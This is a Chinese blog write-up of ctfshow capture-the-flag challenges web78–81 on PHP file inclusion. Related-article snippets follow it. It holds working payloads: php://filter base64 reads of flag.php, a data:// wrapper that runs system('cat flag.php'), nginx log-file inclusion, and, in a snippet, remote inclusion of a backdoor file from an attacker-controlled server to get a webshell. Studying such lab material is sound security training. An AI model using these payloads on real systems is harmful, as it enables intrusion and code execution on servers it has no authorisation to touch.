showCTF 入门文件包含系列

最新推荐文章于 2025-09-26 17:04:10 发布
原创 最新推荐文章于 2025-09-26 17:04:10 发布 · 461 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文介绍如何使用PHP伪协议来读取并获取特定文件的内容,包括通过base64编码绕过限制的方法,以及针对不同服务器配置如nginx的日志文件包含技巧。
  • web78
    读取源代码:
    在这里插入图片描述
    心想,就这?
    直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter
    直接:
    http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php
    成功获取flag.php的文件内容,在线网址解base64:
    https://tool.oschina.net/encrypt?type=3
    在这里插入图片描述
  • web79
    此题和也是利用PHP中的伪协议:
    ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);

  • web80
    本题主要考察nginx服务器的日志文件包含,常见服务器日志文件位置:
    nginx: /var/log/nginx/access.log
    apache: /var/log/httpd/access_log
    bp拦截:
    在这里插入图片描述在这里插入图片描述在这里插入图片描述 - web81
    此题和80题是一样的方法。
ctfshow——文件包含
qq_55202378的博客
02-03 1301
这里不知道的文件路径,可以考虑使用尝试执行php语句,获取文件路径。 可能读取不了文件,这时候试试。linux 命令是倒序读取文件,也就是从最后一行往前读取文件。数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。用法: 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。php伪协议总结: 首先,根据php特性,无法迭代过滤,只过滤一次。此处,如果用替换,可以直接使用双写进行绕过。 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。既
ctfshow——文件上传
qq_55202378的博客
12-27 1887
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFshow 文件包含
Je3Z的博客
06-03 624
web78 ?file=data://text/plain,<?php system("cat flag.php");?> web 79 ?file=data://text/plain,<?= system("cat flag*");?> web80 hao 方法一:远程文件包含 往VPS下面写马,然后远程包含: ?file=http://118.***.***.***/1.txt 方法二:日志文件包含 ?file=/var/log/nginx/access.log 因此往U
CTF之文件包含
最新发布
m0_67212501的博客
09-26 418
按F12查看代码,index.php表明网站使用language参数来动态包含语言文件。由于未正确验证输入,存在文件包含漏洞。攻击者可以通过操纵language参数来包含任意文件。(1)利用php://filter协议,将文件内容转换为Base64编码,从而读取源代码。具体Payload为:language=php://filter/convert.base64-encode/resource=flag。(2)构造HTTP请求,通过HTTP请求中的Cookie字段设置language。
ctfshow 文件包含
qq_53755216的博客
05-17 277
说明 从零开始学 主要为了学知识 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } php伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php php://filter 读取源代码并进行base64编码输出,不然会直接当做php
CTFSHOW—文件包含
灰太的表格的博客
02-04 690
web78 ?file=php://filter/convert.base64-encode/resource=flag.php web79 (php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码 使用方法:data://text/plain;base64,xxxx(base64编码后的数据)) php被过滤使用data伪装协议执行代码 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxh
CTFSHOW 文件包含
CyhDl666的博客
03-27 299
今天 复习一下文件包含漏洞 web 78 payload: ?file=php://filter/convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 这道题开始就有技巧了 源码 过滤了 php和data 伪协议用不了 if(isset($_GET['file'])){ .
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5719
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn13-pwn19
你们de4月天的博客
06-17 2479
ctfshow pwn入门-前置基础pwn13-pwn19
ctfshow web入门 文件上传web162--web167
2301_81040377的博客
04-09 1205
我们上传的文件如果不符合要求,就会被删除,导致成功上传无法访问,没有用。但是如果我们上传的速度比服务器删的速度快,就可以了。#### 本题总结可能你们并不觉得这道题难但是这道题确实难到我了,我做了很久总结一下可能错误的点。一样的操作,如上题,如果代码跑不出来,要么忘记改要么就是没有放包。然后进入下载页面的时候抓包(“下载文件的时候抓包”)压缩文件太大或者太小导致上传不成功或者很难去。,你们可以自己修改,把脚本的也改了就是。访问上传的文件,进行命令执行。只能上传压缩文件,我们就在。里面添加一句话木马就行了。
CTFshow-pwn入门-前置基础pwn29-pwn31
你们de4月天的博客
06-21 2192
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
ctfshow_文件包含
qq_45951598的博客
03-27 429
文章目录WEB78web79 WEB78 没什么好讲的 payload:?file=php://filter/read=convert.base64-encode/resource=falg.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__F
ctfshow文件包含
遇事不决冲冲冲
09-18 3443
web78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 php://filter/read=convert.base64-encode/resource=flag.php web79 data协议 <?php if(isset($_GET['file
CTFSHOW-文件包含
m0_74606212的博客
03-24 596
CTFSHOW-文件包含
ctfshow-文件包含
m0_74456293的博客
03-27 722
ctfshow-文件包含
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值